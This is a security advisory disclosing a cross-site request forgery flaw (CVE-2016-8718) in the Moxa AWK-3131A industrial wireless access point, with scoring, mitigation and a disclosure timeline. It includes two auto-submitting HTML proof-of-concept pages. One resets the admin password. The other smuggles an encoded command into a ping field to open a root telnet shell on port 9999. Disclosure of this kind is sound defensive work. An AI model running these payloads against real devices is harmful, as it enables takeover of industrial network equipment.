Moxa AWK-3131A Web Application Cross-Site Request Forgery Vulnerability(CVE-2016-8718)

### Summary An exploitable Cross-Site Request Forgery vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request. ### Tested Versions Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1 ### Product URLs http://www.moxa.com/product/AWK-3131A.htm ### CVSSv3 Score 7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H ### Details An exploitable Cross-Site Request Forgery (CSRF) vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request. Successful exploitation of this vulnerability can enable an attacker to trick a legitimate user in to performing any action permitted by the device, including exploitation of unrelated vulnerabilities. For example, an attacker may use a CSRF attack to modify device settings or even take advantage of OS Command Injection vulnerabilities to execute operating system commands with root privileges. ### Exploit Proof-of-Concept The below will change the user's password to a value determined by the attacker ``` <html> <body> <form action="http://<device IP>/forms/webSetUserChgPwd" method="POST"> <input type="hidden" name="NowPasswd" value="root" /> <input type="hidden" name="Passwd" value="hacked" /> <input type="hidden" name="ConfPasswd" value="hacked" /> <input type="hidden" name="Submit" value="Submit" /> <input type="hidden" name="UserName" value="admin" /> <input type="hidden" name="bkpath" value="&#47;Password&#46;asp" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` Alternatively, leveraging an OS Command Injection vulnerability in conjunction with CSRF, a client which attempts to render the below page will cause a root-level shell to be opened on the vulnerable device: ``` <html> <body> <form action="http://<device IP>/forms/webSetPingTrace" method="POST"> <input type="hidden" name="srvName" value="&#59;&#32;&#47;bin&#47;busybox&#32;telnetd&#32;&#45;l&#47;bin&#47;sh&#32;&#45;p9999" /> <input type="hidden" name="option" value="0" /> <input type="hidden" name="bkpath" value="&#47;ping&#95;trace&#46;asp" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` ### Mitigation To significantly mitigate risk of exploitation, disable the web application before the device is deployed. ### Timeline * 2016-11-14 - Vendor Disclosure * 2017-04-10 - Public Release ### CREDIT * Discovered by Patrick DeSantis of Cisco Talos.